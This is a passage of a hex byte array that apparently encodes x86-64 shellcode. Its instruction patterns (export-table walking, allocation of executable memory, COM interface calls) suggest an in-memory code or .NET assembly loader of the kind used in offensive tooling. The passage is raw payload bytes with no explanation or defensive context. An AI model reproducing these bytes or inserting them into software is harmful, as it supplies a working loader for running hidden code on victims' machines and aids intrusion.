606 0x13, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x8b,
607 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x5b, 0x02, 0x00, 0x00, 0x48, 0x8b,
608 0x85, 0x18, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x80, 0x04, 0x06, 0x00, 0x00,
609 0x66, 0x85, 0xc0, 0x0f, 0x84, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
610 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x89, 0x85,
611 0xcc, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xcc, 0x00, 0x00, 0x00, 0x00, 0x0f,
612 0x84, 0x4a, 0x02, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48,
613 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
614 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b,
615 0x40, 0x18, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x20, 0x01,
616 0x00, 0x00, 0x00, 0x0f, 0x84, 0x16, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
617 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x85,
618 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x00,
619 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x20,
620 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
621 0x48, 0x89, 0x85, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00,
622 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01,
623 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00,
624 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48,
625 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x00,
626 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85,
627 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x78, 0x48,
628 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x04, 0x06, 0x00,
629 0x00, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x89, 0xc1, 0xe8, 0x5a, 0xf8, 0xff,
630 0xff, 0x85, 0xc0, 0x75, 0x48, 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83,
631 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0x80,
632 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0,
633 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90,
634 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
635 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x10,
636 0x01, 0x00, 0x00, 0xeb, 0x14, 0x83, 0xad, 0x20, 0x01, 0x00, 0x00, 0x01,
637 0x83, 0xbd, 0x20, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x57, 0xff, 0xff,
638 0xff, 0x48, 0x83, 0xbd, 0x10, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x07,
639 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b,
640 0x40, 0x48, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30,
641 0x00, 0x00, 0xba, 0xbc, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00,
642 0xff, 0xd0, 0x48, 0x89, 0x45, 0x70, 0x48, 0x83, 0x7d, 0x70, 0x00, 0x0f,
643 0x84, 0xd6, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xa0, 0x48, 0x8b, 0x45,
644 0x70, 0x41, 0xb8, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xa1,
645 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d,
646 0x90, 0x08, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00,
647 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x41, 0x89, 0xc1, 0x48, 0x8b, 0x8d,
648 0x10, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x49, 0x89, 0xd0, 0x44,
649 0x89, 0xca, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x70, 0x41, 0xb8, 0xbc, 0x00,
650 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x11,
651 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b,
652 0x40, 0x50, 0x48, 0x8b, 0x4d, 0x70, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00,
653 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x5a, 0x48, 0x8b, 0x85,
654 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, 0xc2, 0x48, 0x8b, 0x85,
655 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x68, 0x48,
656 0x8b, 0x8d, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x68, 0x41, 0xb8,
657 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb,
658 0x26, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89,
659 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
660 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0xff, 0xd0, 0xeb, 0x04, 0x90,
661 0xeb, 0x01, 0x90, 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74,
662 0x25, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50,
663 0x48, 0x8b, 0x8d, 0x08, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00,
664 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x04, 0x90, 0xeb,
665 0x01, 0x90, 0x48, 0x81, 0xc4, 0xd0, 0x01, 0x00, 0x00, 0x5d, 0xc3, 0x55,
666 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89, 0x4d, 0x10, 0x48,
667 0x8b, 0x45, 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
668 0x75, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00,
669 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
670 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45,
671 0x10, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x92,
672 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01, 0x48, 0x01, 0xd2, 0x41,
673 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9,
674 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x83,
675 0x7d, 0xf0, 0x00, 0x0f, 0x84, 0x9b, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
676 0x10, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x92,
677 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, 0xd0, 0x48, 0x8b, 0x55,
678 0xf8, 0x48, 0x8d, 0x8a, 0x18, 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24,
679 0x28, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
680 0xff, 0xff, 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
681 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48,
682 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9,
683 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec,
684 0x00, 0x0f, 0x85, 0xf1, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48,
685 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d,
686 0x82, 0xec, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8d, 0x8a,
687 0xdc, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89, 0x54, 0x24,
688 0x20, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
689 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00,
690 0x0f, 0x85, 0x9d, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b,
691 0x00, 0x48, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe0,
692 0x4c, 0x8d, 0x45, 0xd6, 0x48, 0x8b, 0x55, 0xf0, 0xff, 0xd0, 0x89, 0x45,
693 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x64, 0x0f, 0xb7, 0x45, 0xd6, 0x66,
694 0x85, 0xc0, 0x74, 0x5b, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48,
695 0x8b, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xfc, 0x04, 0x00,
696 0x00, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xd8, 0xff, 0xd0, 0x89,
697 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x33, 0x48, 0x8b, 0x45, 0xe0,
698 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b,
699 0x55, 0xd8, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xc8, 0xff, 0xd0,
700 0x89, 0x45, 0xec, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, 0x00, 0x48, 0x8b,
701 0x40, 0x10, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
702 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
703 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48,
704 0x8b, 0x80, 0x30, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10,
705 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48,
706 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0xba, 0x00,
707 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x69, 0x18, 0x00, 0x00, 0x48,
708 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x4d, 0xf0, 0x41,
709 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
710 0x90, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x30,
711 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
712 0x89, 0x8d, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00,
713 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16,
714 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00,
715 0x00, 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b,
716 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00,
717 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
718 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00,
719 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01,
720 0x48, 0x01, 0xd2, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00,
721 0x30, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
722 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xa0, 0x01, 0x00, 0x00,
723 0x00, 0x0f, 0x84, 0x78, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
724 0x00, 0x00, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00,
725 0x00, 0x48, 0x8b, 0x92, 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89,
726 0xd0, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18,
727 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x95, 0xa0,
728 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0xff, 0xff,
729 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00,
730 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00, 0x00,
731 0x48, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01,
732 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, 0x00,
733 0xe8, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0x85,
734 0x38, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48,
735 0x83, 0xc0, 0x18, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00,
736 0x00, 0xe8, 0xc8, 0x06, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x30, 0x01, 0x00,
737 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00,
738 0x48, 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
739 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00,
740 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x59, 0x02,
741 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
742 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x4c,
743 0x8d, 0x82, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00,
744 0x00, 0x48, 0x8d, 0x8a, 0x7c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x80,
745 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x41,
746 0xb8, 0x03, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
747 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00,
748 0x00, 0x0f, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
749 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x95, 0xc0,
750 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x04, 0x00, 0x00, 0x48, 0x8b,
751 0x8d, 0x80, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x88, 0x01, 0x00, 0x00,
752 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01,
753 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8e, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
754 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48,
755 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89,
756 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00,
757 0x0f, 0x85, 0x47, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
758 0x00, 0x48, 0x89, 0x85, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80,
759 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b,
760 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x20, 0x01, 0x00, 0x00,
761 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01,
762 0x00, 0x00, 0x00, 0x0f, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
763 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48,
764 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x03, 0x00,
765 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x01, 0x00,
766 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
767 0x8b, 0x40, 0x40, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b,
768 0x95, 0x90, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x02, 0x00, 0x00, 0x00, 0xff,
769 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
770 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
771 0x90, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0xbd, 0x9c,
772 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8f, 0x00, 0x00, 0x00, 0x48, 0x8b,
773 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x28,
774 0x48, 0x8b, 0x8d, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x01,
775 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x48,
776 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38,
777 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00,
778 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44,
779 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
780 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01,
781 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x75, 0x22, 0x48,
782 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40,
783 0x28, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00,
784 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
785 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48,
786 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
787 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40,
788 0x38, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff,
789 0xd0, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
790 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89,
791 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b,
792 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x8d, 0x14,
793 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xd0, 0xba,
794 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x14, 0x00, 0x00,
795 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48,
796 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00,
797 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x90, 0x48, 0x81, 0xc4, 0x30,
798 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
799 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45,
800 0x18, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00,
801 0x48, 0x8d, 0x15, 0xd5, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b,
802 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x69, 0x01, 0x00, 0x00,
803 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
804 0x8d, 0x15, 0x91, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, 0x8b,
805 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xf3, 0x02, 0x00, 0x00,
806 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
807 0x8d, 0x15, 0xae, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b,
808 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x08, 0x03, 0x00, 0x00,
809 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
810 0x8d, 0x15, 0x09, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b,
811 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x0e, 0x03, 0x00, 0x00,
812 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
813 0x8d, 0x15, 0x14, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b,
814 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xfc, 0x02, 0x00, 0x00,
815 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
816 0x8d, 0x15, 0xf9, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, 0x8b,
817 0x45, 0xf8, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
818 0xf8, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x50, 0x90, 0x48, 0x83,
819 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
820 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20,
821 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x20,
822 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x75, 0x48, 0x8b,
823 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xfc, 0x03, 0x00,
824 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48,
825 0x89, 0xc2, 0xe8, 0x85, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48,
826 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xac, 0x04,
827 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00,
828 0x48, 0x89, 0xc2, 0xe8, 0x60, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x1b,
829 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x10, 0x48,
830 0x8b, 0x4d, 0x10, 0xe8, 0x1d, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00,
831 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00,
832 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x30, 0x5d,
833 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d,
834 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45,
835 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45,
836 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48, 0x8b,
